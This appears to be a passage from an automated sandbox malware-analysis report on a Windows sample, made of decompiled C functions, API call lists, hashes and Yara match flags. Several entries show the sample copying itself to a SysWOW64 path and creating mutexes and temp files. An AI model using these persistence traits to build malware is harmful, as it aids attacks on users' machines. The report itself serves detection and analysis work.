                  						_push((_v280 - _v288 - _t151 >> 1) + _v288);
                  						_push((_v284 - _v292 - _t151 >> 1) + _v292);
                  						_push(_v276);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						_t114 = E0041365C(_t128);
                  						_t135 = _v276;
                  						_v300 = _t114;
                  						E00412D05(_v276, 0, _v292, _v288, _v284 - _v292, _v280 - _v288, 0x114);
                  						_t157 = _v276;
                  						_t153 = 0;
                  					}
                  					if(E0040EE3C(_t128, _t135, GetParent( *(_t157 + 0x20))) != _t128) {
                  						E004133D6(_t157, _t128);
                  					}
                  					_t136 =  *((intOrPtr*)(_t157 + 0x90));
                  					if(_t136 != _t128) {
                  						__eflags = _t136 - _t153;
                  						if(_t136 != _t153) {
                  							__eflags =  *((intOrPtr*)(_t128 + 0x98)) - _t153;
                  							if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
                  								L29:
                  								_t99 = 0;
                  								__eflags = 0;
                  							} else {
                  								__eflags =  *((intOrPtr*)(_t136 + 0x98)) - _t153;
                  								if( *((intOrPtr*)(_t136 + 0x98)) != _t153) {
                  									goto L29;
                  								} else {
                  									_t99 = 1;
                  								}
                  							}
                  							_push(_t99);
                  							_push(0xffffffff);
                  							goto L31;
                  						}
                  					} else {
                  						_push(_t153);
                  						_push(_v300);
                  						L31:
                  						_push(_t157);
                  						E00413A2C(_t136, _t153);
                  					}
                  					 *((intOrPtr*)(_t157 + 0x90)) = _t128;
                  					if(_v296 != _t153) {
                  						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x57);
                  					}
                  					E004139C3(_t128, _t128, _t157);
                  					 *(E00408487(_t128) + 0xe4) =  *(_t76 + 0xe4) | 0x0000000c;
                  				}
                  				_pop(_t154);
                  				_pop(_t158);
                  				_pop(_t129);
                  				return E00430650(_t76, _t129, _v8 ^ _t161, _t151, _t154, _t158);
                  			}



































                  APIs
                  • GetWindowRect.USER32 ref: 004141AB
                  • EqualRect.USER32 ref: 004141D2
                  • IsWindowVisible.USER32(?), ref: 00414281
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 0041365C: GetWindowRect.USER32 ref: 004136C8
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 004143A8
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$Parent$EqualException@8H_prolog3ThrowVisible
                  • String ID: @
                  • API String ID: 2897153062-2766056989
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E00414CC5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t17;
                  				intOrPtr* _t20;
                  				intOrPtr _t26;
                  				void* _t33;
                  				void* _t34;
                  
                  				_push(4);
                  				E00431A9B(E0044B279, __ebx, __edi, __esi);
                  				_t33 = __ecx;
                  				 *((intOrPtr*)(_t34 - 0x10)) = 0;
                  				E00414C61(__ecx, 0x20, _t34 - 0x10);
                  				if( *((intOrPtr*)(_t34 + 8)) != 0) {
                  					_t37 =  *((intOrPtr*)(_t34 - 0x10));
                  					if( *((intOrPtr*)(_t34 - 0x10)) == 0) {
                  						_t26 = E00404461(_t37, 0x20);
                  						 *((intOrPtr*)(_t34 - 0x10)) = _t26;
                  						 *(_t34 - 4) = 0;
                  						_t38 = _t26;
                  						if(_t26 == 0) {
                  							_t20 = 0;
                  							__eflags = 0;
                  						} else {
                  							_push(0x1e);
                  							_push( *((intOrPtr*)(_t34 + 8)));
                  							_push("File%d");
                  							_push("Recent File List");
                  							_push(0);
                  							_t20 = E00426DDD(__ebx, _t26, __edx, 0, _t33, _t38);
                  						}
                  						 *(_t34 - 4) =  *(_t34 - 4) | 0xffffffff;
                  						 *((intOrPtr*)(_t33 + 0x88)) = _t20;
                  						 *((intOrPtr*)( *_t20 + 0x10))();
                  					}
                  				}
                  				_t17 = E00426574(_t33, "Settings", "PreviewPages", 0); // executed
                  				 *((intOrPtr*)(_t33 + 0x94)) = _t17;
                  				return E00431B73(_t17);
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414CCC
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 00426DDD: __EH_prolog3.LIBCMT ref: 00426DE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$_malloc
                  • String ID: File%d$PreviewPages$Recent File List$Settings
                  • API String ID: 1683881009-526586445
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 76%
                  			E0041FC5A(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                  				signed int _v8;
                  				char _v263;
                  				char _v264;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t9;
                  				int _t16;
                  				struct HWND__* _t22;
                  				intOrPtr _t23;
                  				void* _t24;
                  				intOrPtr _t27;
                  				void* _t28;
                  				int _t29;
                  				intOrPtr _t30;
                  				CHAR* _t32;
                  				intOrPtr _t33;
                  				signed int _t37;
                  
                  				_t27 = __edx;
                  				_t24 = __ecx;
                  				_t35 = _t37;
                  				_t9 =  *0x463404; // 0x18eab29f
                  				_v8 = _t9 ^ _t37;
                  				_t22 = _a4;
                  				_t32 = _a8;
                  				_push(_t28);
                  				_t41 = _t22;
                  				if(_t22 == 0) {
                  					L2:
                  					E00406436(_t22, _t24, _t28, _t32, _t41);
                  				}
                  				if(_t32 == 0) {
                  					goto L2;
                  				}
                  				_t29 = lstrlenA(_t32);
                  				_v264 = 0;
                  				E00431160(_t29,  &_v263, 0, 0xff);
                  				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29) {
                  					L7:
                  					_t16 = SetWindowTextA(_t22, _t32);
                  				} else {
                  					_t16 = lstrcmpA( &_v264, _t32); // executed
                  					if(_t16 != 0) {
                  						goto L7;
                  					}
                  				}
                  				_pop(_t30);
                  				_pop(_t33);
                  				_pop(_t23);
                  				return E00430650(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
                  			}























                  APIs
                  • lstrlenA.KERNEL32(0040539B,?,00000204), ref: 0041FC86
                  • _memset.LIBCMT ref: 0041FCA3
                  • GetWindowTextA.USER32 ref: 0041FCBD
                  • lstrcmpA.KERNEL32(00000000,0040539B,?,00000204), ref: 0041FCCF
                  • SetWindowTextA.USER32(?,0040539B), ref: 0041FCDB
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                  • String ID:
                  • API String ID: 4273134663-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 023EA8F0: CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 023EA930
                  • WaitForSingleObject.KERNEL32(00000000,?,00000000,023EAC6C), ref: 023EAA10
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,023EAC6C), ref: 023EAA44
                  • ResetEvent.KERNEL32(?,00000000,023EAC6C), ref: 023EAA58
                  • ReleaseMutex.KERNEL32(?,00000000,023EAC6C), ref: 023EAA66
                  • CloseHandle.KERNEL32(?,00000000,023EAC6C), ref: 023EAA72
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle
                  • String ID:
                  • API String ID: 3891338068-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00448692(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t50;
                  				void* _t54;
                  				intOrPtr _t57;
                  				intOrPtr* _t59;
                  				intOrPtr* _t63;
                  				void* _t76;
                  				void* _t77;
                  				intOrPtr* _t80;
                  				char* _t81;
                  				char _t84;
                  				intOrPtr* _t87;
                  				intOrPtr* _t118;
                  				intOrPtr* _t123;
                  				void* _t124;
                  				void* _t125;
                  
                  				_push(0x54);
                  				E00431B04(E0044CC2A, __ebx, __edi, __esi);
                  				_t84 =  *((intOrPtr*)(_t124 + 8));
                  				_t123 = __ecx;
                  				if(_t84 != 0xffffffff) {
                  					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
                  					_t118 = 0;
                  					__eflags = _t87;
                  					if(_t87 == 0) {
                  						L7:
                  						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
                  						__eflags = _t50 - _t118;
                  						if(_t50 != _t118) {
                  							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
                  							if(__eflags != 0) {
                  								 *((char*)(_t124 - 0x30)) = _t84;
                  								E00448494(_t84, _t124 - 0x2c, _t109, 8, _t118);
                  								 *((intOrPtr*)(_t124 - 4)) = _t118;
                  								_t54 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
                  								_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
                  								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
                  								_push(_t124 - 0x38);
                  								_t84 = _t123 + 0x44;
                  								while(1) {
                  									_t113 = _t124 - 0x30;
                  									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
                  									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
                  									__eflags = _t59;
                  									if(_t59 < 0) {
                  										break;
                  									}
                  									__eflags = _t59 - 1;
                  									if(_t59 > 1) {
                  										__eflags = _t59 - 3;
                  										if(__eflags != 0) {
                  											goto L25;
                  										} else {
                  											_t63 = E00447F97(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
                  											__eflags = _t63;
                  											if(_t63 != 0) {
                  												goto L27;
                  											} else {
                  												goto L25;
                  											}
                  										}
                  									} else {
                  										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x58));
                  										__eflags = _t118;
                  										if(_t118 == 0) {
                  											L16:
                  											_t67 = _t124 - 0x30;
                  											 *((char*)(_t123 + 0x41)) = 1;
                  											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
                  											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
                  												L27:
                  												_t123 =  *((intOrPtr*)(_t124 + 8));
                  											} else {
                  												__eflags = _t118;
                  												if(_t118 > 0) {
                  													L20:
                  													 *((intOrPtr*)(_t124 - 0x40)) = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
                  													_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
                  													_push(_t124 - 0x38);
                  													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
                  													__eflags = _t118;
                  													continue;
                  												} else {
                  													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
                  													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
                  														goto L25;
                  													} else {
                  														E00448268(_t67, _t124 - 0x2c, _t113, _t123, 8, 0);
                  														goto L20;
                  													}
                  												}
                  											}
                  										} else {
                  											_t76 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x60));
                  											_push( *((intOrPtr*)(_t123 + 0x4c)));
                  											_push(_t118);
                  											_push(1);
                  											_push(_t76);
                  											_t77 = E00449E18(_t84, _t113, _t118, _t123, __eflags);
                  											_t125 = _t125 + 0x10;
                  											__eflags = _t118 - _t77;
                  											if(_t118 != _t77) {
                  												L25:
                  												__eflags = _t123;
                  											} else {
                  												goto L16;
                  											}
                  										}
                  									}
                  									E00402090(_t124 - 0x2c, _t124, 1, 0);
                  									goto L2;
                  								}
                  								goto L25;
                  							} else {
                  								_t50 = E00447F97(__eflags, _t84, _t50); // executed
                  								__eflags = _t50;
                  								if(_t50 == 0) {
                  									goto L8;
                  								} else {
                  									goto L6;
                  								}
                  							}
                  						} else {
                  							L8:
                  						}
                  					} else {
                  						_t80 =  *((intOrPtr*)(__ecx + 0x34));
                  						_t109 =  *_t80 + _t87;
                  						__eflags = _t87 -  *_t80 + _t87;
                  						if(_t87 >=  *_t80 + _t87) {
                  							goto L7;
                  						} else {
                  							 *_t80 =  *_t80 - 1;
                  							__eflags =  *_t80;
                  							_t123 =  *((intOrPtr*)(__ecx + 0x24));
                  							_t81 =  *_t123;
                  							 *_t123 = _t81 + 1;
                  							 *_t81 = _t84;
                  							L6:
                  						}
                  					}
                  				} else {
                  				}
                  				L2:
                  				return E00431B87(_t84, _t118, _t123);
                  			}



















                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Fputc$H_prolog3_
                  • String ID:
                  • API String ID: 2569218679-3916222277
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 023E1000: GetFileAttributesW.KERNELBASE(?), ref: 023E1047
                    • Part of subcall function 023E1000: CreateDirectoryW.KERNEL32(?,00000000), ref: 023E105A
                    • Part of subcall function 023E1000: GetLastError.KERNEL32 ref: 023E1064
                  • GetTempPathW.KERNEL32(00000104,?,?,C:\Windows\SysWOW64\fwdrrebrand.exe), ref: 023ED3A1
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?,?,C:\Windows\SysWOW64\fwdrrebrand.exe), ref: 023ED3B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$AttributesCreateDirectoryErrorLastNamePath
                  • String ID: C:\Users\user\Desktop\yf4df4w2cr.exe$C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 3625196337-615456372
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileAttributesW.KERNELBASE(?), ref: 023E1047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 023E105A
                  • GetLastError.KERNEL32 ref: 023E1064
                  Strings
                  • C:\Windows\SysWOW64\fwdrrebrand.exe, xrefs: 023E101B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 674977465-640560957
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 76%
                  			E004016F0(void* __ecx, void* __edx, void* __ebp) {
                  				int _v8;
                  				char _v12;
                  				signed int _v32;
                  				signed int _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				void* _v48;
                  				intOrPtr _v60;
                  				void* _v64;
                  				char _v80;
                  				char _v84;
                  				void* _v88;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t26;
                  				intOrPtr* _t31;
                  				intOrPtr* _t32;
                  				intOrPtr* _t34;
                  				intOrPtr _t35;
                  				intOrPtr* _t36;
                  				intOrPtr* _t42;
                  				long _t52;
                  				signed int _t54;
                  				signed int _t55;
                  				void* _t81;
                  				intOrPtr* _t86;
                  				void* _t91;
                  				void* _t96;
                  				signed int _t97;
                  				void* _t98;
                  
                  				_t81 = __edx;
                  				_push(0xffffffff);
                  				_push(E0044A85C);
                  				_push( *[fs:0x0]);
                  				_t97 = _t96 - 0x2c;
                  				_push(_t54);
                  				_t26 =  *0x463404; // 0x18eab29f
                  				_push(_t26 ^ _t97);
                  				 *[fs:0x0] =  &_v12;
                  				_t91 = __ecx;
                  				_t85 = GetVersion;
                  				if(GetVersion() >= 0) {
                  					L4:
                  					E00414CC5(_t54, _t91, _t81, _t85, _t91, __eflags, 4); // executed
                  					_t31 = E00404461(__eflags, 0x90);
                  					_t98 = _t97 + 4;
                  					_v60 = _t31;
                  					_v8 = 0;
                  					__eflags = _t31;
                  					if(__eflags == 0) {
                  						_t32 = 0;
                  						__eflags = 0;
                  					} else {
                  						_push(0x44eccc);
                  						_push(0x44f424);
                  						_push(0x44f10c);
                  						_push(0x81);
                  						_t32 = E004172AA(_t54, _t31, _t81, _t85, _t91, __eflags);
                  					}
                  					_t55 = _t54 | 0xffffffff;
                  					_push(_t32);
                  					 *(_t98 + 0x48) = _t55;
                  					E00416787(_t55, _t91, _t85, _t91, __eflags);
                  					_t34 = E00404461(__eflags, 0x248);
                  					_t97 = _t98 + 4;
                  					_v60 = _t34;
                  					_v8 = 1;
                  					__eflags = _t34;
                  					if(_t34 == 0) {
                  						_t86 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t86 = E00401380();
                  					}
                  					_t35 =  *_t86;
                  					_t82 =  *((intOrPtr*)(_t35 + 0x140));
                  					_v8 = _t55;
                  					_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x140))))(0x80, 0xcf8000, 0, 0); // executed
                  					__eflags = _t36;
                  					if(__eflags == 0) {
                  						goto L3;
                  					} else {
                  						 *((intOrPtr*)(_t91 + 0x20)) = _t86;
                  						E00416A7E(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
                  						_push(1);
                  						E004165C6(); // executed
                  						E0041576C(_t97 + 0x14, __eflags);
                  						 *((intOrPtr*)(_t97 + 0x48)) = 2;
                  						E00414D4B(_t97 + 0x14);
                  						_push( &_v80);
                  						_t42 = E00416609(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
                  						__eflags = _t42;
                  						if(_t42 != 0) {
                  							DragAcceptFiles( *( *((intOrPtr*)(_t91 + 0x20)) + 0x20), 1);
                  							E00412C34(_t86,  *((intOrPtr*)(_t91 + 0x4c)));
                  							UpdateWindow( *(_t86 + 0x20));
                  							_v36 = _t55;
                  							E004157B0( &_v84,  *( *((intOrPtr*)(_t91 + 0x20)) + 0x20));
                  							 *[fs:0x0] = _v44;
                  							return 1;
                  						} else {
                  							_v32 = _t55;
                  							E004157B0( &_v80, _t82);
                  							__eflags = 0;
                  							 *[fs:0x0] = _v40;
                  							return 0;
                  						}
                  					}
                  				} else {
                  					_t52 = GetVersion();
                  					_t103 = _t52 - 4;
                  					if(_t52 >= 4) {
                  						goto L4;
                  					} else {
                  						_push(0xffffffff);
                  						_push(0);
                  						_push(0x66);
                  						E00417146(_t54, _t81, GetVersion, _t91, _t103);
                  						L3:
                  						 *[fs:0x0] = _v32;
                  						return 0;
                  					}
                  				}
                  			}

                  APIs
                  • GetVersion.KERNEL32(18EAB29F), ref: 0040171E
                  • GetVersion.KERNEL32 ref: 00401724
                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00401859
                  • UpdateWindow.USER32(?), ref: 0040186E
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Version$AcceptDragFilesH_prolog3UpdateWindow
                  • String ID:
                  • API String ID: 1881653373-0
                  • Opcode ID: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction ID: a17e9845648d9b61e4f7684013c638e6b3f52b511be3bda972cb7d9a165d9d00
                  • Opcode Fuzzy Hash: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction Fuzzy Hash: 6641B1B13443009BD714EB25DD42BAAB7E5AB84B14F00093FFA46933D1EB79E805875A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00426700(void* __ecx, intOrPtr _a4, CHAR* _a8, char* _a12, long _a16) {
                  				int* _v8;
                  				char _v16;
                  				signed int _v20;
                  				char _v4116;
                  				char _v4120;
                  				intOrPtr _v4124;
                  				CHAR* _v4128;
                  				int _v4132;
                  				long _v4136;
                  				void* _v4140;
                  				int _v4144;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t45;
                  				signed int _t46;
                  				CHAR* _t48;
                  				intOrPtr _t52;
                  				void* _t54;
                  				long _t58;
                  				char* _t69;
                  				intOrPtr _t70;
                  				intOrPtr _t79;
                  				long _t85;
                  				intOrPtr _t87;
                  				intOrPtr _t88;
                  				void* _t89;
                  				intOrPtr _t92;
                  				signed int _t93;
                  
                  				_t71 = __ecx;
                  				_push(0xffffffff);
                  				_push(E0044C291);
                  				_push( *[fs:0x0]);
                  				E004348C0(0x1020);
                  				_t45 =  *0x463404; // 0x18eab29f
                  				_t46 = _t45 ^ _t93;
                  				_v20 = _t46;
                  				_push(_t46);
                  				 *[fs:0x0] =  &_v16;
                  				_t87 = _a4;
                  				_t85 = _a16;
                  				_t48 = _a8;
                  				_t69 = _a12;
                  				_v4124 = _t87;
                  				_v4128 = _t85;
                  				_v4136 = 0;
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					__eflags = _t85;
                  					if(__eflags == 0) {
                  						_v4128 = 0x44f0f5;
                  					}
                  					GetPrivateProfileStringA(_t48, _t69, _v4128,  &_v4116, 0x1000,  *(_t71 + 0x68)); // executed
                  					_push( &_v4116);
                  					goto L12;
                  				} else {
                  					_t54 = E0042652C(__ecx, _t48);
                  					_v4140 = _t54;
                  					_t95 = _t54;
                  					if(_t54 != 0) {
                  						E004014C0( &_v4120, _t85);
                  						_t89 = RegQueryValueExA;
                  						_v8 = 0;
                  						_v4144 = 0;
                  						_v4132 = 0;
                  						_t58 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, 0,  &_v4132);
                  						_v4136 = _t58;
                  						__eflags = _t58;
                  						if(_t58 == 0) {
                  							_v4136 = RegQueryValueExA(_v4140, _t69, 0,  &_v4144, E004014F0( &_v4120, _v4132),  &_v4132);
                  							E0040A356( &_v4120, 0xffffffff);
                  						}
                  						RegCloseKey(_v4140);
                  						_t79 = _v4124;
                  						__eflags = _v4136;
                  						if(__eflags != 0) {
                  							_push(_v4128);
                  							E00406039(_t69, _t79, _t85, _t89, 0, __eflags);
                  						} else {
                  							E00405562(_t79, __eflags,  &_v4120);
                  						}
                  						E004010B0(_v4120 + 0xfffffff0, _t85);
                  						_t52 = _v4124;
                  					} else {
                  						_push(_v4128);
                  						L12:
                  						E00406039(_t69, _t87, _t85, _t87, 0, _t95);
                  						_t52 = _t87;
                  					}
                  				}
                  				 *[fs:0x0] = _v16;
                  				_pop(_t88);
                  				_pop(_t92);
                  				_pop(_t70);
                  				return E00430650(_t52, _t70, _v20 ^ _t93, _t85, _t88, _t92);
                  			}

                  APIs
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,18EAB29F,?,?,?,?,0044C291,000000FF), ref: 004267AF
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,0044C291,000000FF), ref: 004267E3
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,0044C291,000000FF), ref: 004267FE
                  • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 00426866
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: QueryValue$ClosePrivateProfileString
                  • String ID:
                  • API String ID: 1042844925-0
                  • Opcode ID: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction ID: d787f72a76d7a1e81abdc91ab3fdba828746559dca16c0f286bccc120076d8c8
                  • Opcode Fuzzy Hash: 44fdfa9ff4de0f88582ee937e59d4afd3fbe754f203e2044626775c54224bd21
                  • Instruction Fuzzy Hash: C2416A75D001A8ABDB31DF55DC449EEB7B8EB48354F0041EAF189A2290C7B89EC5DF68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E0040F918(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t16;
                  				struct HWND__* _t18;
                  				struct HWND__* _t20;
                  				void* _t22;
                  				void* _t23;
                  				void* _t24;
                  				struct HWND__* _t25;
                  
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_t24 = GetTopWindow;
                  				_t16 = GetTopWindow(_a4);
                  				while(1) {
                  					_t25 = _t16;
                  					if(_t25 == 0) {
                  						break;
                  					}
                  					__eflags = _a24;
                  					if(__eflags == 0) {
                  						SendMessageA(_t25, _a8, _a12, _a16);
                  					} else {
                  						_t20 = E0040EE68(_t23, _t24, _t25, __eflags, _t25);
                  						__eflags = _t20;
                  						if(__eflags != 0) {
                  							_push(_a16);
                  							_push(_a12);
                  							_push(_a8);
                  							_push( *((intOrPtr*)(_t20 + 0x20)));
                  							_push(_t20); // executed
                  							E0040F62D(_t22, _t24, _t25, __eflags); // executed
                  						}
                  					}
                  					__eflags = _a20;
                  					if(_a20 != 0) {
                  						_t18 = GetTopWindow(_t25);
                  						__eflags = _t18;
                  						if(_t18 != 0) {
                  							E0040F918(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24); // executed
                  						}
                  					}
                  					_t16 = GetWindow(_t25, 2);
                  				}
                  				return _t16;
                  			}

                  APIs
                  • GetTopWindow.USER32(?), ref: 0040F928
                  • GetTopWindow.USER32(00000000), ref: 0040F967
                  • GetWindow.USER32(00000000,00000002), ref: 0040F985
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
